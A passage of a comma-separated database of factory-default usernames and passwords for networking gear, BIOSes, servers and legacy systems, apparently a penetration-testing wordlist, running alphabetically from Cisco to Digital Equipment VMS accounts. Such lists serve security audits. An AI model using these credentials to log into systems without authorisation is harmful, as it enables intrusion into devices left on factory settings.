Detector,,SNMP,,riverhead,,,\ncisco,Trailhead,,4.0,admin,admin,,,\ncisco,Trailhead,4,HTTP,admin,admin,Admin,,\ncisco,Trailhead,4.0,HTTP,admin,admin,Admin,,\ncisco,Unity,,,EAdmin,,,,\ncisco,Unity,,,EAdminlt;systemidgt;,,,,\ncisco,Unity,,,ESubscriber,,,,\ncisco,Unity,,,UAMIS_,,,,\ncisco,Unity,,,UAMIS_lt;servernamegt;,,,,\ncisco,Unity,,,UNITY_,,,,\ncisco,Unity,,,UNITY_lt;servernamegt;,,,,\ncisco,Unity,,,UOMNI_,,,,\ncisco,Unity,,,UOMNI_lt;servernamegt;,,,,\ncisco,Unity,,,UVPIM_,,,,\ncisco,Unity,,,UVPIM_lt;servernamegt;,,,,\ncisco,Unity,,1.3.2,bubba,,,,\ncisco,Unity,1.3.2,local,bubba,(unk),,Part numbers imprinted on the installation disks with a local user account bubba default RAID Manager address and DHCP server address:80-7111-01 for the UNITY-SVRX255-1A80-7112-01 for the UNITY-SVRX255-2A,\ncisco,Unity,1.3.2,local,bubba,(unk),,Part numbers imprinted on the installation disks with a local user account bubba,\ncisco,VPN 3000 Concentrator,,,admin,admin,,,\ncisco,VPN Concentrator 3000 series,3,Multi,admin,admin,Admin,,\ncisco,VPN3000,,,,changeit,,,\ncisco,Video Surveillance Manager (VSM),,,root,secur4u,,,\ncisco,WLSE,,Multi,root,blender,Admin,,\ncisco,WLSE,,Multi,wlse,wlsedb,Admin,,\ncisco,WRV54G,,192.168.1.1,admin,admin,Admin,,\ncisco,WRVS4400N,,192.168.1.1,admin,admin,Admin,,\ncisco,any,,,no default login,no default password,,any IOS,\ncisco,cva 122,,,admin,admin,,,\ncisco,cva 122,,Admin,admin,admin,,,\ncisco,cva 122,,Telnet,admin,admin,Admin,,\ncisco-arrowpoint,Arrowpoint,,,admin,system,,,\ncisco-arrowpoint,Arrowpoint,,Admin,admin,system,,,\ncitrix,Access Gateway,,,nsroot,nsroot,,,\nclaris,At-Ease,,,,familymacintosh,,,\nclearonecommunications,Converge Pro,,,clearone,converge,,,\nclearonecommunications,Converge,,,ClearOne,RAV,,,\ncnet,804-nf,,Admin,Admin,epicrouter,,,\ncnet,804-nf,,HTTP,Admin,epicrouter,Admin,,\ncnet,804-nf,,HTTP,admin,password,http://,,\ncnet,804-nf,,HTTP,admin,password,http://lt;ip-adressgt;,,\ncnet,804-nf,,http:// ,admin,password,,,\ncnet,CNET 4PORT ADSL MODEM,CNAD NF400,Multi,admin,epicrouter,Admin,,\ncobalt,RaQ * Qube*,,,admin,admin,,Any,\ncobalt,RaQ Qube,,,admin,admin,,,\ncobalt,Unknown,,,admin,admin,,,\ncolubris,MSC,5100,user,admin,admin,admin,continue with https,\ncolubrisnetworks,MSC 5100,,,admin,admin,,,\ncolubrisnetworks,MSC 5100,5100,http - https,admin,admin,Admin,make exception for invalid certificate to continue with https,\ncolubrisnetworks,MSC 5100,5100,http -> https,admin,admin,Admin,make exception for invalid certificate to continue with https,\ncomcast,Xfinity Wireless Gateway,,,admin,password,,,\ncomersus,Comersus Shopping Cart,3.2,,,admin,dmr99,,\ncomersus,Shopping Cart,,,admin,dmr99,,,\ncomodo,MyDLP,,,mydlp,mydlp,,,\ncompaq,Familiar Linux,,,root,rootme,,,\ncompaq,Familiar Linux,,telnet/ssh/con,root,rootme,Admin,,\ncompaq,Insight Manager,,,PFCUser,240653C9467E45,,,\ncompaq,Insight Manager,,,PFCUser,240653C9467E45,User,,\ncompaq,Insight Manager,,,administrator,administrator,,,\ncompaq,Insight Manager,,,administrator,administrator,Admin,,\ncompaq,Insight Manager,,,anonymous,,,,\ncompaq,Insight Manager,,,anonymous,,User,,\ncompaq,Insight Manager,,,operator,operator,,,\ncompaq,Insight Manager,,,user,public,,,\ncompaq,Insight Manager,,,user,public,User,,\ncompaq,Insight Manager,,,user,user,,,\ncompaq,Insight Manager,,,user,user,User,,\ncompaq,Insight Manager,,Admin,administrator,administrator,,,\ncompaq,Insight Manager,,User,PFCUser,240653C9467E45,,,\ncompaq,Insight Manager,,User,anonymous,,,,\ncompaq,Insight Manager,,User,user,public,,,\ncompaq,Insight Manager,,User,user,user,,,\ncompaq,Management Agents,,,administrator,,,All,\ncompaq,Networth FastPipes,,,root,manager,,,\ncompaq,Networth FastPipes,,Console,root,manager,,,\ncompaq,PC BIOS,,,,Compaq,,,\ncompaq,PC BIOS,,Admin,,Compaq,,,\ncompaq,PC BIOS,,Console,,Compaq,Admin,,\ncompaq,T1010,,@ , ,use ALT+G at boot to reset config,,,\ncompaq,T1010,,Multi,,use ALT+G at boot to reset config,@,,\ncompaq,T1010,,Multi,lt;no defaultgt;,use ALT+G at boot to reset config,@lt;ALTgt;lt;Ggt;,,\ncompaq,WBEM,,,administrator,administrator,,,\ncompaq,WBEM,,HTTP 2301 / HTTPS 2381,administrator,administrator,Admin,,\ncompex,MMC543AHV,,http://192.168.168.1,admin,Password,Admin,,\ncompex,NetPassage 15,,192.168.0.1,admin,password,Admin,,\ncompex,NetPassage 15B,,192.168.168.1,,password,Admin,,\ncompex,NetPassage 15BR,,http://192.168.168.1,,password,Administration,,\ncompex,NetPassage 18,,http://192.168.168.1,,password,Administration,,\ncompualynx,Cmail Server,,All Versions,administrator,asecret,,,\ncompualynx,Cmail Server,all,multi,administrator,asecret,Admin,,\ncompualynx,Cproxy Server,,All Versions,administrator,asecret,,,\ncompualynx,Cproxy Server,all,multi,administrator,asecret,Admin,,\ncompualynx,SCM,,All Versions,administrator,asecret,,,\ncompualynx,SCM,all,multi,administrator,asecret,Admin,,\ncomputer associates,ControlIT,,,DEFAULT,default,,,\ncomputer associates,ControlIT,,Desktop/console access,DEFAULT,default,,,\ncomputerassociates,ControlIT,,ControlIT,DEFAULT,default,Desktop/console access,,\ncomtrend,CT-5361T,,192.168.1.1,root,12345,,,\ncomtrend,CT-5361T,,http192.168.2.1,user,12345,View Device Info Statistics and Error Log.,,\ncomtrend,CT-5361T,,http192.168.2.1,user,12345,View Device Info, and Error Log.,\ncomtrend,CT5361T,,http://192.168.1.1,admin,admin,user,,\ncomtrend,CT560,,http://192.168.1.1,aolbb,setup,Admin,,\ncomtrend,CT812M,all,192.168.30.1,admin,admin,Admin,web,\ncomtrend,CT812M,all,192.168.30.1,root,NetC0mmV3oo,Admin,telnet,\ncomtrend,Nexuszlink 3100u,,192.168.2.1,,,,,\ncomtrend,ct536+,,Multi,admin,,Admin,,\nconceptronic,C100BRS4H,,,admin,1234,,,\nconceptronic,C100BRS4H,,HTTP,admin,1234,,,\nconceptronic,CADSLR4,,HTTP/telnet,admin,password,Admin,Default IP 192.168.1.254,\nconceptronic,CADSLR4,,HTTP/telnet,anonymous,password,anon,Default IP 192.168.1.254,\nconceptronic,CFULLHDMAi,,telnet port 4836,,conceptronic2008,,,\nconceptronic,cdeskcam,1,,conceptronic,,,camera,\nconceptronic,cdeskcam,1.0,,conceptronic,,,camera,\nconcord,PC BIOS,,,,last,,,\nconcord,PC BIOS,,,,last,Admin,,\nconcord,PC BIOS,,Admin,,last,,,\nconexant,ACCESS RUNNER ADSL CONSOLE PORT 3.27,,Telnet,Administrator,admin,Admin,,\nconexant,PAE-CE81,,,admin,epicrouter,,,\nconexant,PAE-CE81,,Multi,admin,epicrouter,,,\nconexant,Router,,HTTP,,admin,Admin,yes,\nconexant,Router,,HTTP,,epicrouter,Admin,,\nconexant,Router,,HTTP,admin,amigosw1,Admin,,\nconexant,Router,,HTTP,admin,conexant,Admin,,\nconexant,Router,,HTTP,admin,epicrouter,Admin,,\nconexant,Router,,HTTP,admin,password,Admin,,\nconexant,four port ethernet switch,,,admin,epicrouter,,,\nconitec,3D Gamestudio,,Capek,Adam,29111991,,,\nconitec,3D Gamestudio,6.22,Serial,Adam,29111991,Capek,,\ncontrol4,Home Theater Controller AVMHTC1B,,,,ducati900ss,,,\ncontrol4,Home Theater Controller AVMHTC1B,,,root,t0talc0ntr0l4!,,,\ncorecess,3113,,Multi,admin,,Admin,,\ncorecess,6808 APC,,Telnet,corecess,corecess,User,,\ncorecess,Corecess 3112,,HTTP,Administrator,admin,Admin,,\ncovertix,SmartCipher,,,Admin,Admin,,,\ncoyotepoint,Equaliser 4,,,eqadmin - Serial port only,equalizer,,Free BSD,\ncoyotepoint,Equaliser 4,,,look,look,,Free BSD - Web Browser only,\ncoyotepoint,Equaliser 4,,,root ,,,Free BSD - Serial port only,\ncoyotepoint,Equaliser 4,,,root,,,Free BSD - Serial port only,\ncoyotepoint,Equaliser 4,,,touch,touch,,Free BSD - Web Browser only,\ncreative,2015U,,Multi,,,Admin,,\ncrystalview,OutsideView 32,,,,Crystal,,,\ncrystalview,OutsideView 32,,,,Crystal,Admin,,\ncrystalview,OutsideView 32,,Admin,,Crystal,,,\nctcunion,ATU-R130,81001a,Multi,root,root,Admin,,\nctx international,PC BIOS,,,,CTX_123,,,\nctx international,PC BIOS,,Admin,,CTX_123,,,\nctxinternational,PC BIOS,,Console,,CTX_123,Admin,,\ncyberguard,Firewall,,,cgadmin,cgadmin,,,\ncyberguard,SG300,,http://192.168.0.1,root,default,Administration,,\ncyberguard,SG560,,http://192.168.0.1,root,default,Administration,,\ncyberguard,SG565,,http://192.168.0.1,root,default,Administration,,\ncyberguard,all firewalls,all,console + passport1,cgadmin,cgadmin,Admin,,\ncybermax,PC BIOS,,,,Congress,,,\ncybermax,PC BIOS,,Admin,,Congress,,,\ncybermax,PC BIOS,,Console,,Congress,Admin,,\ncyberoam,CR100ia,All,172.16.16.16,cyberoam,cyber,Admin,,\ncyberoam,CR15i,All,172.16.16.16,cyberoam,cyber,Admin,,\ncyberoam,CR25ia,All,172.16.16.16,cyberoam,cyber,Admin,,\ncyberoam,CR50ia,All,172.16.16.16,cyberoam,cyber,Admin,,\ncyberoam,Multiple,,,admin,admin,,,\ncyberoam,iView,,,admin,admin,,,\ncyberoam,iView,,,root,admin,,,\ncyclades,Cyclades-TS800,,TS800,root,tslinux,,,\ncyclades,MP/RT,,,super,surt,,,\ncyclades,PR-1000,,,super,surt,,,\ncyclades,PR-1000,,Telnet,super,surt,Admin,,\ncyclades,PR1000,,,super,surt,,,\ncyclades,TS800,,HTTP,root,tslinux,Admin,,\ncyclades,TS800,,telnet/ssh/http,root,,Admin,,\nd-link,604,,,Admin,,,,\nd-link,Cable/DSL Routers/Switches,,Admin,,admin,,,\nd-link,D-704P,,rev b,admin,,,,\nd-link,DCS-1000,,admin,,,,,\nd-link,DI-524,,Admin,admin,,,,\nd-link,DI-604,,Admin,user,,,,\nd-link,DI-604,,rev a rev b rev c rev e,admin,,,,\nd-link,DI-614+,,Admin,admin,,,,\nd-link,DI-614+,,User,user,,,,\nd-link,DI-624,,,admin,,,,\nd-link,DI-624,,192.168.0.1,Admin,,,,\nd-link,DI-701,,Admin,admin,year2000,,,\nd-link,DI-704,,rev a,,admin,,,\nd-link,DI-714P+,,192.168.0.1,admin,____BLANK___,,,\nd-link,DI-804,,Admin,admin,,,,\nd-link,DI-804,,v2.03,admin,,,,\nd-link,DSL-300,,,,private,,,\nd-link,DSL-300G+,,admin?,,private,,,\nd-link,DSL-504,,,,private,,,\nd-link,DSL-G664T,,,admin,admin,,,\nd-link,DWL 900AP,,,,public,,,\nd-link,DWL 900AP,,Admin,admin,public,,,\nd-link,Routers,,DI-764,admin,,,,\nd-link,hubs/switches,,,D-Link,D-Link,,,\ndaewoo,PC BIOS,,,,Daewuu,,,\ndaewoo,PC BIOS,,Admin,,Daewuu,,,\ndaewoo,PC BIOS,,Console,,Daewuu,Admin,,\ndallas semiconductors,TINI embedded JAVA Module,,<= 1.0,root,tini,,,\ndallas semiconductors,TINI embedded JAVA Module,,Admin,root,tini,,,\ndallas semiconductors,TINI embedded JAVA Module,,tini,Telnet,root,,,\ndallassemiconductors,TINI embedded JAVA Module,1,Telnet,root,tini,Admin,,\ndallassemiconductors,TINI embedded JAVA Module,1.0 or lower,Telnet,root,tini,Admin,,\ndallassemiconductors,TINI embedded JAVA Module,1.0,Telnet,root,tini,Admin,,\ndallassemiconductors,TINI embedded JAVA Module,below 1.0,Telnet,root,tini,Admin,,\ndarkman,ioFTPD,,root,ioFTPD,ioFTPD,,,\ndarkman,ioFTPD,all,Other,ioFTPD,ioFTPD,root,,\ndassaultsystemes,Enovia V6,,,Test Everything,,,,\ndata general,AOS/VS,,,op,operator,,,\ndata general,AOS/VS,,,operator,operator,,,\ndatacom,BSASX/101,,,,letmein,,,\ndatacom,BSASX/101,,,,letmein,Admin,,\ndatacom,BSASX/101,,Admin,,letmein,,,\ndatacom,NSBrowse,,,sysadm,sysadm,,,\ndatacom,NSBrowse,,,sysadm,sysadm,Admin,,\ndatageneral,AOS/VS,,multi,op,op,Admin,,\ndatageneral,AOS/VS,,multi,op,operator,Admin,,\ndatageneral,AOS/VS,,multi,operator,operator,Admin,,\ndatawizard.net,FTPXQ server,,,anonymous,any@,,,\ndatawizard.net,FTPXQ server,,read/write,anonymous,any,,,\ndatawizardtechnologiesinc,FtpQX server,,FTP,anonymous,(any),Read only on C: by default,,\ndatawizardtechnologiesinc,FtpQX server,,FTP,test,test,Test user has R/W permission on C: drive by default,,\ndavolink,DV2020,,,user,user,,,\ndavolink,DV2020,,Http://192.168.1.1,user,user,user settings,,\ndavox,Unison,,Multi,admin,admin,User,,\ndavox,Unison,,Multi,davox,davox,User,,\ndavox,Unison,,Multi,root,davox,Admin,,\ndavox,Unison,,Sybase,sa,,Admin,,\ndaytek,PC BIOS,,,,Daytec,,,\ndaytek,PC BIOS,,Admin,,Daytec,,,\ndaytek,PC BIOS,,Console,,Daytec,Admin,,\ndebian,Linux LILO Default,,2.2,,tatercounter2000,,,\ndebian,Linux LILO Default,2.2,console,,tatercounter2000,Admin,,\ndecnet,decnet,,,operator,admin,,,\ndecnet,decnet,,Guest,operator,admin,,,\ndeerfield,MDaemon,,HTTP,MDaemon,MServer,Admin,web interface to manage MDaemon. fixed June 2002,\ndeerfield,WorldClient and MDaemon,,5.0.5.0,MDaemon,MServer,,,\ndeerfield,WorldClient,5.0.5.0,,MDaemon,MServer,,Can be used to send/recv mail remotely,\ndell latitude cpx,dell,,,admin,admin,,,\ndell,B1260dn,,Web Console Via IP address,admin,dell00000,,,\ndell,CSr500xt,,,,admin,,,\ndell,CSr500xt,,Admin,,admin,,,\ndell,CSr500xt,,Multi,,admin,Admin,,\ndell,DRAC,,,root,calvin,,,\ndell,DRAC,,,root,calvin,management,,\ndell,ERA,,,root,calvin,,,\ndell,ERA,,,root,calvin,Admin - Embedded remote access,,\ndell,Inspiron,,Multi,,admin,Admin,,\ndell,Kace K2000,,,admin,admin,,,\ndell,Laser Printer 3000cn / 3100cn,,HTTP,admin,password,Admin,,\ndell,Latitude CMOS,CPi,console,,nx0nu4bbe,,Enter password then CTRL+Enter,\ndell,Latitude,,Admin,,1RRWTTOOI,,,\ndell,Latitude,,Bios D35B,,1RRWTTOOI,,,\ndell,Latitude,Bios D35B,Multi,,1RRWTTOOI,Admin,,\ndell,Lattitude CMOS,,CPi,,nz0u4bbe,,,\ndell,OpenManage Server Console,,,root,calvin,,,\ndell,OpenManage Server Console,,Admin,root,calvin,,,\ndell,OpenManage Server Console,,Console,root,calvin,Admin,,\ndell,PC BIOS,,,,Dell,,,\ndell,PC BIOS,,Admin,,Dell,,,\ndell,PC BIOS,,Console,,Dell,Admin,,\ndell,PowerConnect 2708,,192.168.2.1,admin,,Admin,,\ndell,PowerEdge 1655MC,,,admin,admin,Admin,,\ndell,PowerEdge 2650 RAC,,,root,calvin,,,\ndell,PowerEdge 2650 RAC,,HTTP,root,calvin,,,\ndell,PowerVault 35F,,,root,calvin,,,\ndell,PowerVault 50F,,,root,calvin,,,\ndell,PowerVault TL-2000/4000,,http://,Admin,secure,,,\ndell,Powerapp Web 100 Linux,,,root,powerapp,,RedHat 6.2,\ndell,Poweredge,,1655MC,admin,admin,,,\ndell,RAC,,,root,calvin,,,\ndell,Remote Access Card,,HTTP,root,calvin,Admin,,\ndell,Switch PowerConnect,,,admin,admin,,,\ndell,Switch PowerConnect,,,admin,admin,Admin,,\ndell,TrueMobile 1184 Wireless Broadband Gateway Router,,Admin,admin,admin,,,\ndell,TrueMobile 1184 Wireless Broadband Gateway Router,,HTTP,admin,admin,Admin,,\ndell,TrueMobile 1184 Wireless Broadband Gateway Router,,unknown,admin,admin,,,\ndell,TrueMobile 1184 Wireless Broadband Gateway Router,unknown,HTTP,admin,admin,Admin,,\ndell,TrueMobile 2300 Router,,,admin,admin,,,\ndell,Winterm,,,,Fireport,,,\ndell,Winterm,,,VNC,winterm,,,\ndell,Winterm,,,root,wyse,,,\ndell,Wyse Rapport,,,rapport,r@p8p0r+,,,\ndell,inspiron,,,,admin,,,\ndell,inspiron,,Admin,,admin,,,\ndell,latitude,,a05,,admin,,,\ndemarc,Network Monitor,,,admin,my_DEMARC,,,\ndemarc,Network Monitor,,Admin,admin,my_DEMARC,,,\ndemarc,Network Monitor,,multi,admin,my_DEMARC,Admin,,\ndeutschetelekom,T-Sinus 130 DSL,,HTTP,,0,Admin,,\ndeutschetelekom,T-Sinus 154 DSL,13.9.38,HTTP,,0,Admin,thx to AwdCzAb,\ndeutschetelekom,T-Sinus DSL 130,,HTTP,admin,,Admin,Usuallay also a WirelessLan AP :),\ndevelcon,Orbitor Default Console,,,,BRIDGE,,,\ndevelcon,Orbitor Default Console,,,,BRIDGE,Admin,,\ndevelcon,Orbitor Default Console,,,,password,,,\ndevelcon,Orbitor Default Console,,,,password,Admin,,\ndevelcon,Orbitor Default Console,,Admin,,BRIDGE,,,\ndevelcon,Orbitor Default Console,,Admin,,password,,,\ndictaphone,ProLog,,,NETOP,,,,\ndictaphone,ProLog,,,NETWORK,NETWORK,,,\ndictaphone,ProLog,,,PBX,PBX,,,\ndigiboard,Portserver 8 16,,,root,dbps,,any,\ndigiboard,Portserver 8 & 16,,,root,dbps,,any,\ndigicom,Michelangelo,,Multi,admin,michelangelo,Admin,,\ndigicom,Michelangelo,,Multi,user,password,User,,\ndigicorp,Router,,,,BRIDGE,Admin,,\ndigicorp,Router,,,,password,Admin,,\ndigicorp,Viper,,,,BRIDGE,,,\ndigicorp,Viper,,Admin,,BRIDGE,,,\ndigicorp,Viper,,Admin,,password,,,\ndigicorp,Viper,,Telnet,,BRIDGE,Admin,,\ndigicorp,Viper,,Telnet,,password,Admin,,\ndigicraft software,Yak!,,2.0.1,Yak,asd123,,,\ndigicraftsoftware,Yak!,2.0.1,FTP (default port 3535),Yak,asd123,,,\ndigiinternational,Digi One SP,all versions,http,root,dbps,Full configuration,Device default to DHCP for IP address.,\ndigital equipment,10-Dec,,,1,manager,,,\ndigital equipment,10-Dec,,,2,maintain,,,\ndigital equipment,10-Dec,,,2,operator,,,\ndigital equipment,10-Dec,,,30,games,,,\ndigital equipment,10-Dec,,,5,games,,,\ndigital equipment,10-Dec,,,7,maintain,,,\ndigital equipment,DEC-10,,,1,manager,,,\ndigital equipment,DEC-10,,,2,operator,,,\ndigital equipment,DEC-10,,,30,games,,,\ndigital equipment,DEC-10,,,5,games,,,\ndigital equipment,DEC-10,,,7,maintain,,,\ndigital equipment,DEC-10,,Admin,1,manager,,,\ndigital equipment,DEC-10,,Admin,1,operator,,,\ndigital equipment,DEC-10,,Admin,1,syslib,,,\ndigital equipment,DEC-10,,Admin,2,maintain,,,\ndigital equipment,DEC-10,,Admin,2,manager,,,\ndigital equipment,DEC-10,,Admin,2,operator,,,\ndigital equipment,DEC-10,,Admin,2,syslib,,,\ndigital equipment,DEC-10,,User,30,games,,,\ndigital equipment,DEC-10,,User,5,games,,,\ndigital equipment,DEC-10,,User,7,maintain,,,\ndigital equipment,DecServer,,,,ACCESS,,,\ndigital equipment,DecServer,,Admin,,ACCESS,,,\ndigital equipment,DecServer,,Admin,,SYSTEM,,,\ndigital equipment,IRIS,,,PDP11,PDP11,,,\ndigital equipment,IRIS,,,PDP8,PDP8,,,\ndigital equipment,IRIS,,,accounting,accounting,,,\ndigital equipment,IRIS,,,boss,boss,,,\ndigital equipment,IRIS,,,demo,demo,,,\ndigital equipment,IRIS,,,manager,manager,,,\ndigital equipment,IRIS,,,software,software,,,\ndigital equipment,IRIS,,Admin,accounting,accounting,,,\ndigital equipment,IRIS,,Admin,boss,boss,,,\ndigital equipment,IRIS,,Admin,manager,manager,,,\ndigital equipment,IRIS,,User,PDP11,PDP11,,,\ndigital equipment,IRIS,,User,PDP8,PDP8,,,\ndigital equipment,IRIS,,User,demo,demo,,,\ndigital equipment,IRIS,,User,software,software,,,\ndigital equipment,PC BIOS,,,,komprie,,,\ndigital equipment,PC BIOS,,Admin,,komprie,,,\ndigital equipment,RSX,,,,1,,,\ndigital equipment,RSX,,,1.1,SYSTEM,,,\ndigital equipment,RSX,,,BATCH,BATCH,,,\ndigital equipment,RSX,,,SYSTEM,MANAGER,,,\ndigital equipment,RSX,,,USER,USER,,,\ndigital equipment,RSX,,Admin,1.1,SYSTEM,,,\ndigital equipment,RSX,,Admin,SYSTEM,MANAGER,,,\ndigital equipment,RSX,,Admin,SYSTEM,SYSTEM,,,\ndigital equipment,RSX,,User,BATCH,BATCH,,,\ndigital equipment,RSX,,User,USER,USER,,,\ndigital equipment,Terminal Server,,,,access,,,\ndigital equipment,Terminal Server,,,,system,,,\ndigital equipment,Terminal Server,,Admin,,system,,,\ndigital equipment,Terminal Server,,User,,access,,,\ndigital equipment,VMS,,,ALLIN1,ALLIN1,,,\ndigital equipment,VMS,,,ALLIN1MAIL,ALLIN1MAIL,,,\ndigital equipment,VMS,,,ALLINONE,ALLINONE,,,\ndigital equipment,VMS,,,BACKUP,BACKUP,,,\ndigital equipment,VMS,,,DCL,DCL,,,\ndigital equipment,VMS,,,DECMAIL,DECMAIL,,,\ndigital equipment,VMS,,,DECNET,DECNET,,,\ndigital equipment,VMS,,,DECNET,NONPRIV,,,\ndigital equipment,VMS,,,DEFAULT,DEFAULT,,,\ndigital equipment,VMS,,,DEFAULT,USER,,,\ndigital equipment,VMS,,,DEMO,DEMO,,,\ndigital equipment,VMS,,,FIELD,DIGITAL,,,\ndigital equipment,VMS,,,FIELD,FIELD,,,\ndigital equipment,VMS,,,FIELD,SERVICE,,,\ndigital equipment,VMS,,,FIELD,TEST,,,\ndigital equipment,VMS,,,GUEST,GUEST,,,\ndigital equipment,VMS,,,HELP,HELP,,,\ndigital equipment,VMS,,,HELPDESK,HELPDESK,,,\ndigital equipment,VMS,,,HOST,HOST,,,\ndigital equipment,VMS,,,INFO,INFO,,,\ndigital equipment,VMS,,,INGRES,INGRES,,,\ndigital equipment,VMS,,,LINK,LINK,,,\ndigital equipment,VMS,,,MAILER,MAILER,,,\ndigital equipment,VMS,,,MBMANAGER,MBMANAGER,,,\ndigital equipment,VMS,,,MBWATCH,MBWATCH,,,\ndigital equipment,VMS,,,NETCON,NETCON,,,\ndigital equipment,VMS,,,NETMGR,NETMGR,,,\ndigital equipment,VMS,,,NETNONPRIV,NETNONPRIV,,,\ndigital equipment,VMS,,,NETPRIV,NETPRIV,,,\ndigital equipment,VMS,,,NETSERVER,NETSERVER,,,\ndigital equipment,VMS,,,NETWORK,NETWORK,,,\ndigital equipment,VMS,,,NEWINGRES,NEWINGRES,,,\ndigital equipment,VMS,,,NEWS,NEWS,,,\ndigital equipment,VMS,,,OPERVAX,OPERVAX,,,\ndigital equipment,VMS,,,POSTMASTER,POSTMASTER,,,\ndigital equipment,VMS,,,PRIV,PRIV,,,\ndigital equipment,VMS,,,REPORT,REPORT,,,\ndigital equipment,VMS,,,RJE,RJE,,,\ndigital equipment,VMS,,,STUDENT,STUDENT,,,\ndigital equipment,VMS,,,SYS,SYS,,,\ndigital equipment,VMS,,,SYSMAINT,DIGITAL,,,\ndigital equipment,VMS,,,SYSMAINT,SERVICE,,,\ndigital equipment,VMS,,,SYSMAINT,SYSMAINT,,,\ndigital equipment,VMS,,,SYSTEM,MANAGER,,,\ndigital equipment,VMS,,,SYSTEM,OPERATOR,,,\ndigital equipment,VMS,,,SYSTEM,SYSLIB,,,\ndigital equipment,VMS,,,SYSTEM,SYSTEM,,,\ndigital equipment,VMS,,,SYSTEST,UETP,,,\ndigital equipment,VMS,,,SYSTEST_CLIG,SYSTEST,,,\ndigital equipment,VMS,,,SYSTEST_CLIG,SYSTEST_CLIG,,,\ndigital equipment,VMS,,,TELEDEMO,TELEDEMO,,,\ndigital equipment,VMS,,,TEST,TEST,,,\ndigital equipment,VMS,,,UETP,UETP,,,\ndigital equipment,VMS,,,USER,PASSWORD,,,\ndigital equipment,VMS,,,USERP,USERP,,,\ndigital equipment,VMS,,,VAX,VAX,,,\ndigital equipment,VMS,,,VMS,VMS,,,\ndigitalequipment,10-Dec,,Multi,1,manager,Admin,,\ndigitalequipment,10-Dec,,Multi,1,operator,Admin,,\ndigitalequipment,10-Dec,,Multi,1,syslib,Admin,,\ndigitalequipment,10-Dec,,Multi,2,maintain,Admin,,\ndigitalequipment,10-Dec,,Multi,2,manager,Admin,,\ndigitalequipment,10-Dec,,Multi,2,operator,Admin,,\ndigitalequipment,10-Dec,,Multi,2,syslib,Admin,,\ndigitalequipment,10-Dec,,Multi,30,games,User,,\ndigitalequipment,10-Dec,,Multi,5,games,User,,\ndigitalequipment,10-Dec,,Multi,7,maintain,User,,\ndigitalequipment,DEC-10,,Multi,1,manager,Admin,,\ndigitalequipment,DEC-10,,Multi,1,operator,Admin,,\ndigitalequipment,DEC-10,,Multi,1,syslib,Admin,,\ndigitalequipment,DEC-10,,Multi,2,maintain,Admin,,\ndigitalequipment,DEC-10,,Multi,2,manager,Admin,,\ndigitalequipment,DEC-10,,Multi,2,operator,Admin,,\ndigitalequipment,DEC-10,,Multi,2,syslib,Admin,,\ndigitalequipment,DEC-10,,Multi,30,games,User,,\ndigitalequipment,DEC-10,,Multi,5,games,User,,\ndigitalequipment,DEC-10,,Multi,7,maintain,User,,\ndigitalequipment,DecServer,,Multi,,ACCESS,Admin,,\ndigitalequipment,DecServer,,Multi,,SYSTEM,Admin,,\ndigitalequipment,IRIS,,Multi,PDP11,PDP11,User,,\ndigitalequipment,IRIS,,Multi,PDP8,PDP8,User,,\ndigitalequipment,IRIS,,Multi,accounting,accounting,Admin,,\ndigitalequipment,IRIS,,Multi,boss,boss,Admin,,\ndigitalequipment,IRIS,,Multi,demo,demo,User,,\ndigitalequipment,IRIS,,Multi,manager,manager,Admin,,\ndigitalequipment,IRIS,,Multi,software,software,User,,\ndigitalequipment,PC BIOS,,Console,,komprie,Admin,,\ndigitalequipment,RSX,,Multi,1,,Level 1,,\ndigitalequipment,RSX,,Multi,1.1,SYSTEM,Admin,,\ndigitalequipment,RSX,,Multi,BATCH,BATCH,User,,\ndigitalequipment,RSX,,Multi,SYSTEM,MANAGER,Admin,,\ndigitalequipment,RSX,,Multi,SYSTEM,SYSTEM,Admin,,\ndigitalequipment,RSX,,Multi,USER,USER,User,,\ndigitalequipment,Terminal Server,,Port 7000,,access,User,,\ndigitalequipment,Terminal Server,,Port 7000,,system,Admin,,\ndigitalequipment,VMS,,Multi,ALLIN1,ALLIN1,,,\ndigitalequipment,VMS,,Multi,ALLIN1MAIL,ALLIN1MAIL,,,\ndigitalequipment,VMS,,Multi,ALLINONE,ALLINONE,,,\ndigitalequipment,VMS,,Multi,BACKUP,BACKUP,,,\ndigitalequipment,VMS,,Multi,DCL,DCL,,,\ndigitalequipment,VMS,,Multi,DECMAIL,DECMAIL,,,\ndigitalequipment,VMS,,Multi,DECNET,DECNET,,,\ndigitalequipment,VMS,,Multi,DECNET,NONPRIV,,,\ndigitalequipment,VMS,,Multi,DEFAULT,DEFAULT,,,\ndigitalequipment,VMS,,Multi,DEFAULT,USER,,,\ndigitalequipment,VMS,,Multi,DEMO,DEMO,,,\ndigitalequipment,VMS,,Multi,FIELD,DIGITAL,,,\ndigitalequipment,VMS,,Multi,FIELD,FIELD,,,\ndigitalequipment,VMS,,Multi,FIELD,SERVICE,,,\ndigitalequipment,VMS,,Multi,FIELD,TEST,,,\ndigitalequipment,VMS,,Multi,GUEST,GUEST,,,\ndigitalequipment,VMS,,Multi,HELP,HELP,,,\ndigitalequipment,VMS,,Multi,HELPDESK,HELPDESK,,,\ndigitalequipment,VMS,,Multi,HOST,HOST,,,\ndigitalequipment,VMS,,Multi,INFO,INFO,,,\ndigitalequipment,VMS,,Multi,INGRES,INGRES,,,\ndigitalequipment,VMS,,Multi,LINK,LINK,,,\ndigitalequipment,VMS,,Multi,MAILER,MAILER,,,\ndigitalequipment,VMS,,Multi,MBMANAGER,MBMANAGER,,,\ndigitalequipment,VMS,,Multi,MBWATCH,MBWATCH,,,\ndigitalequipment,VMS,,Multi,NETCON,NETCON,,,\ndigitalequipment,VMS,,Multi,NETMGR,NETMGR,,,\ndigitalequipment,VMS,,Multi,NETNONPRIV,NETNONPRIV,,,\ndigitalequipment,VMS,,Multi,NETPRIV,NETPRIV,,,\ndigitalequipment,VMS,,Multi,NETSERVER,NETSERVER,,,\ndigitalequipment,VMS,,Multi,NETWORK,NETWORK,,,\ndigitalequipment,VMS,,Multi,NEWINGRES,NEWINGRES,,,\ndigitalequipment,VMS,,Multi,NEWS,NEWS,,,\ndigitalequipment,VMS,,Multi,OPERVAX,OPERVAX,,,\ndigitalequipment,VMS,,Multi,POSTMASTER,POSTMASTER,,,\ndigitalequipment,VMS,,Multi,PRIV,PRIV,,,\ndigitalequipment,VMS,,Multi,REPORT,REPORT,,,\ndigitalequipment,VMS,,Multi,RJE,RJE,,,\ndigitalequipment,VMS,,Multi,STUDENT,STUDENT,,,\ndigitalequipment,VMS,,Multi,SYS,SYS,,,\ndigitalequipment,VMS,,Multi,SYSMAINT,DIGI